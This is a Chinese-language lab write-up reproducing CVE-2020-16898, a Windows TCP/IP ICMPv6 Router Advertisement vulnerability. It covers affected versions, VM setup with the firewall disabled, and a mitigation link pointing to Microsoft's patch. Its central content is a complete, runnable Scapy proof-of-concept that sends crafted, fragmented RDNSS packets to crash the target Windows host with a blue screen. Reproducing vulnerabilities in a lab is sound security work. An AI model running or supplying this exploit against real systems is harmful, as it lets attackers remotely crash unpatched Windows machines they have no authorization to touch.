TCP/IP远程代码执行漏洞（CVE-2020-16898）复现

简介

Windows TCP/IP堆栈不正确地处理ICMPv6 Router Advertisement数据包时，存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以获得在目标服务器或客户端上执行代码的能力。要利用此漏洞，攻击者必须将经过特殊设计的ICMPv6 Router Advertisement数据包发送到远程Windows计算机上。

 

漏洞概述

 

Windows TCP/IP堆栈在处理IMCPv6 Router Advertisement（路由通告）数据包时存在漏洞，远程攻击者通过构造特制的ICMPv6 Router Advertisement（路由通告）数据包，并将其发送到远程Windows主机上，即可在目标主机上执行任意代码。

影响版本

 

microsoft:window_server_2019:/1903/1909/2004

microsoft:window_server_2019:*

microsoft:window_server:1903/1909/2004

 

 

环境搭建

 

打开虚拟网络编辑器

开启ipv6

安装一个受影响的win10镜像

关闭防火墙

查看ipv6地址

可以ping通

漏洞复现

 

攻击机的ipv6

v6_dst填写目标的ipv6

v6_src填写攻击机的ipv6

Poc

#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd15:4ba5:5a2b:1008:89e:ba00:7122:2d9"
v6_src = "fe80::f81e:2b9a:f1a2:59c0"


p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

运行代码

python3 p_CVE-2020-16898.py

修复建议

 

通过如下链接自行寻找符合操作系统版本的漏洞补丁，并进行补丁下载安装。

CVE-2020-16898 | Windows TCP/IP远程执行代码漏洞

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898